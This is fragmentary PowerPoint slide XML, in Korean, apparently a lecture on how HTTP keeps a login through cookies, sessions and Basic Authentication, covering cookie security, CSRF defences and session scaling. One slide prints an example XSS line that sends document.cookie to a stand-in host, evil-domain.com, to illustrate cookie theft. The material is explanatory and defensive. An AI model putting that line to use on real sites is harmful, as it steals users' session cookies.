          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="3548134"/>
            <a:ext cx="1004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중간에 공격자에 의해 쿠키 정보가 쉽게 읽히지 않도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인 경우에만 쿠키를 전송하도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Secure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AE117-8025-8211-21A7-3D5FBD3128ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="2222808"/>
            <a:ext cx="872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new Image().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=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"http://www.evil-domain.com/steal-cookie.php?cookie=" +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document.cookie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F14DF-C286-F613-78D6-C261133ADE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291690" y="4220258"/>
            <a:ext cx="316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사이트 간 요청 위조</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(CSRF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>공격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4BBE5-C61D-8BB1-F5B1-98378F85E94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="4671441"/>
            <a:ext cx="11447365" cy="120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로그인한 상태</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>유효한 쿠키가 발급된 상태</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 특정 행동을 하는 페이지로 요청 시 공격자의 의도대로 특정 행동이 수행됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방지 위해 요청 페이지 정보 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>리퍼러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>), CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>토큰 발행 및 검증</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿠키의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Lax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>또는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>등 필요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en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>* 2008.02. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>옥션에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>1863</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>만 명의 개인정보가 유출된 사고는 이미지 태그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>(GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>메서드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>를 통한 관리자 비밀번호 변경으로 발생함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6EC27-7F59-4889-F709-E978AC49E091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291690" y="611437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개수와 용량의 제한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B6B10-B74B-237F-6885-D9185767C4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2335952" y="6114370"/>
            <a:ext cx="759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도메인당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한 개의 쿠키당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4KiB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 제한돼 저장할 수 있는 양에 한계가 있음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>웹 스토리지는 브라우저 종료 시 또는 만료 기한이 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사이트에서 별도 처리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55BC7-5D1A-5615-2889-6CCAA803E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E401C-4786-441F-D436-A06762F5CA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로그인 시 쿠키에 아이디와 비밀번호를 저장할까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BF4CF-873D-D155-CDDE-09F5C9C67D20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="1263316"/>
            <a:ext cx="83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ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>로 요청과 응답이 암호화되니까 쿠키에 아이디와 비밀번호를 저장해도 되지 않나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>..?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EF7D8-393F-DA0D-4FFD-1578E0D537C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="1856490"/>
            <a:ext cx="10006265" cy="17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HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 클라이언트와 서버 간 통신을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SSL/TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 암호화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브라우저 또는 운영체제가 악성 코드에 감염 시 쿠키 내 데이터가 탈취될 수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비밀번호를 암호화해도 검증을 위해 복호화가 필요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비밀번호 암호화 및 복호화 과정이 복잡하며 클라이언트와 서버가 동일한 암호 알고리즘을 사용해야 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403FF-2C5A-F32B-AD21-FE13A6D1D9A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21340400">
            <a:off x="1849170" y="4574119"/>
            <a:ext cx="8728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그러면 어떻게 로그인을 유지할 수 있는 것인가요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>…!?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7066E3A-49D3-C121-5D28-FC1E068920B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="238219">
            <a:off x="1987894" y="4536831"/>
            <a:ext cx="8451225" cy="1203250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8451225"/>
              <a:gd name="connsiteY0" fmla="*/ 1203250 h 1203250"/>
              <a:gd name="connsiteX1" fmla="*/ 3537284 w 8451225"/>
              <a:gd name="connsiteY1" fmla="*/ 475340 h 1203250"/>
              <a:gd name="connsiteX2" fmla="*/ 4385511 w 8451225"/>
              <a:gd name="connsiteY2" fmla="*/ 493387 h 1203250"/>
              <a:gd name="connsiteX3" fmla="*/ 6587290 w 8451225"/>
              <a:gd name="connsiteY3" fmla="*/ 36187 h 1203250"/>
              <a:gd name="connsiteX4" fmla="*/ 8277727 w 8451225"/>
              <a:gd name="connsiteY4" fmla="*/ 30171 h 1203250"/>
              <a:gd name="connsiteX5" fmla="*/ 8386011 w 8451225"/>
              <a:gd name="connsiteY5" fmla="*/ 42203 h 1203250"/>
              <a:gd name="connsiteX6" fmla="*/ 8187490 w 8451225"/>
              <a:gd name="connsiteY6" fmla="*/ 18140 h 1203250"/>
              <a:gd name="connsiteX7" fmla="*/ 8175458 w 8451225"/>
              <a:gd name="connsiteY7" fmla="*/ 48219 h 12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51225" h="1203250">
                <a:moveTo>
                  <a:pt x="0" y="1203250"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1179095" y="960613"/>
                  <a:pt x="2806366" y="593650"/>
                  <a:pt x="3537284" y="475340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4268202" y="357030"/>
                  <a:pt x="3877177" y="566579"/>
                  <a:pt x="4385511" y="493387"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4893845" y="420195"/>
                  <a:pt x="5938587" y="113390"/>
                  <a:pt x="6587290" y="36187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7235993" y="-41016"/>
                  <a:pt x="7977940" y="29168"/>
                  <a:pt x="8277727" y="30171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8577514" y="31174"/>
                  <a:pt x="8401050" y="44208"/>
                  <a:pt x="8386011" y="42203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8370972" y="40198"/>
                  <a:pt x="8222582" y="17137"/>
                  <a:pt x="8187490" y="18140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8152398" y="19143"/>
                  <a:pt x="8163928" y="33681"/>
                  <a:pt x="8175458" y="48219"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:alpha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2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102D7-ED46-56F6-D36F-FC9C970B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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Session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1F4672-5C99-9F45-8799-2A8B72635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8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EA10B-67DA-2BA7-9E8E-C58B89AC0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041FE0-6B4B-2BFE-DF0F-4FC65DAA5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CE5B9-9B66-8B34-9D89-14782ADB948B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514272" y="1347537"/>
            <a:ext cx="8937062" cy="17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쿠키를 기반으로 클라이언트를 식별하기 위한 방법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클라이언트 구분을 위해 세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 부여해 클라이언트가 서버 접속 후 종료까지 인증 상태 유지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특정 시간 동안 활동이 없으면 세션을 만료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 정보를 서버에 저장하므로 사용자가 많아지면 서버에 부담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56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B9F97-A196-1544-3511-20FA45CF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320528-7DF9-7DE1-11E4-6AB07B6E6D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세션의 생성과 저장 과정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83F43B-7C9D-7525-5AC8-26B63909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49" y="1300707"/>
            <a:ext cx="1618297" cy="235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F86A97A-2A1E-9858-8DDA-A62034D2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02" y="1300707"/>
            <a:ext cx="2491698" cy="294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07D9BEA-E436-E4A5-AC15-9FFCDE941556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="2069279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CEA6B2-734C-517C-8F88-1975A499FF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="162306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GET /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A37D636-B8A2-005F-C39D-AFB1AFB8C0A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2773730" y="3311079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04B495-96AA-CC1E-2A77-16FBBB9CFFEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="254431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200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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OK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Set-Cookie: SESSION_ID=D449</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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E6D19A-07D0-8621-5443-E2486770BFC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773732" y="4255762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0C14BC-98C9-4DEB-96F2-94D4160D47F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773731" y="3551952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GET /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Cookie: SESSION_ID=D449;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쿠키 키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쿠키 값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7350CB0-DC71-4B8D-1FAD-C821395EDBC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2773730" y="5632734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D44BE7-EFBD-C865-5C2C-DDDF0EA82487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="51429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200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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E8B28-12ED-5BB4-E945-F04635B92CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8069727" y="2367631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세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>생성 후</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>메모리에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58467-6BC6-D48B-C908-C7DFD02BB124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236952" y="4420762"/>
            <a:ext cx="3551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메모리에서</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 키로 사용자 정보를 불러와</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자 확인 후 페이지 응답</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188326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B983A-B98C-02E6-6F9D-84C1C8274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50EC6E0-3585-1BDD-D4D8-706C5DFBE3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DADD5-9926-0B7B-E748-0A7D2E12CAD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514272" y="1347537"/>
            <a:ext cx="10273966" cy="2952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클라이언트가 요청 시마다 서버가 아이디와 비밀번호가 일치하는 사용자를 데이터베이스에서 매번 조회하므로</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자가 많다면 서버 성능이 저하됨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 확장 시 다른 서버에 세션이 존재하지 않음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Sticky Session: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>처음 요청 시 세션을 생성한 서버로만 요청을 보냄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Session Clustering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>모든 서버가 세션을 복제해 공유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Session Storage: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>별도의 세션 저장 서버 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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 지향하지만 세션으로 상태를 유지하도록 보완할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31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15F8F-D0CE-AE5F-4439-47EF6F59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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Tomcat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>세션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D2139D-21DE-7F1E-78A7-B44F7B74E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81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99B2D-8FBC-DAE9-0D70-81CED37D7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F372E00-DBD0-148B-300C-12984959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12" y="811422"/>
            <a:ext cx="12296188" cy="604657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A89351A0-A3AE-5714-01B9-EF1AE3061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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>애플리케이션을 통한 세션 생성 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228000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E4007E8-995F-75E8-FFCC-31F676020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915015-5B7F-CF44-BABB-C5A09152CC78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291689" y="1288473"/>
            <a:ext cx="4265099" cy="372904"/>
            <a:chOff x="158641" y="1429789"/>
            <a:chExt cx="4265099" cy="3729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028365-0FEA-5866-E2DD-4C338228884B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158641" y="142978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00-1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82D132-E5CF-9B4A-A090-5D78D0DAB609}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1363287" y="1433361"/>
              <a:ext cx="3060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HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                <a:t>는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                <a:t>Stateless</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                <a:t>를 지향한다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878678-5EEB-D1B7-06AA-EA401BCB99A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291689" y="1781695"/>
            <a:ext cx="5975504" cy="372904"/>
            <a:chOff x="158641" y="1429789"/>
            <a:chExt cx="5975504" cy="3729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BD20CD-FA37-8BF5-71F5-5330BB4854F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158641" y="142978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00-3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E0C189-9CE6-B6C6-0054-F99D09481AF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1363287" y="1433361"/>
              <a:ext cx="4770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Stateless</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                <a:t>로 설계 시 로그인을 어떻게 유지하는가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7BE8F0-8524-213F-593C-256DCD8A3B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="293292" y="2274917"/>
            <a:ext cx="4159302" cy="372904"/>
            <a:chOff x="160244" y="1429789"/>
            <a:chExt cx="4159302" cy="3729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EAE2DC-EF28-327D-4FEB-BDC716C36665}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="160244" y="1429789"/>
              <a:ext cx="713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01    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48D296-2477-57AF-735F-A7B1678E5246}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1363287" y="1433361"/>
              <a:ext cx="2956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HTTP Basic Authentication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6289E7-412D-C67D-E5B0-D0BA0847BF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="296739" y="2768139"/>
            <a:ext cx="2107458" cy="372904"/>
            <a:chOff x="160244" y="1429789"/>
            <a:chExt cx="2107458" cy="37290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D5DA99-8620-6C6F-3B51-43A432C9F552}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="160244" y="1429789"/>
              <a:ext cx="713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02    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4B4B9C-90EF-D24A-90DA-7C8025D65DE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1363287" y="1433361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Cookie</a:t>
              </a:r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3D5B6B-BD9F-926B-1DA2-9575C3DDD02D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="293292" y="3261361"/>
            <a:ext cx="2192416" cy="372904"/>
            <a:chOff x="160244" y="1429789"/>
            <a:chExt cx="2192416" cy="3729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381853-42B2-ECBB-7220-FE1ED0F84771}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="160244" y="1429789"/>
              <a:ext cx="713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03    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7AA46C-FEE2-FD72-6D9D-36E830D92E12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1363287" y="1433361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Session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3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6A5E-2325-1ABD-01E4-243A983F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D151F6-9978-C155-440E-6540DE2D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87738"/>
            <a:ext cx="12292973" cy="607656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81D3453-541B-7B19-3B5E-7F808B974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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>애플리케이션을 통한 세션 생성 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233161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FB7DC-C244-7BA4-E11F-84CBEAB1B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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>애플리케이션을 통한 세션 생성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0C1643-B8E7-72BA-AD0B-8CD95107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49" y="794582"/>
            <a:ext cx="12265934" cy="60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2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7077C-B850-D977-5B3B-6FE0177EF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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>애플리케이션을 통한 세션 생성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EEDB5-4816-B5E8-EB6A-4D003820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" y="805992"/>
            <a:ext cx="12230231" cy="60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E837B-D8FF-C61B-F104-177ECE23F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NAVER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 세션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909734-8153-EED7-FC77-ADDDD9F2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722"/>
            <a:ext cx="12192000" cy="6758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215753B-4951-193D-6391-408699DCCDDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
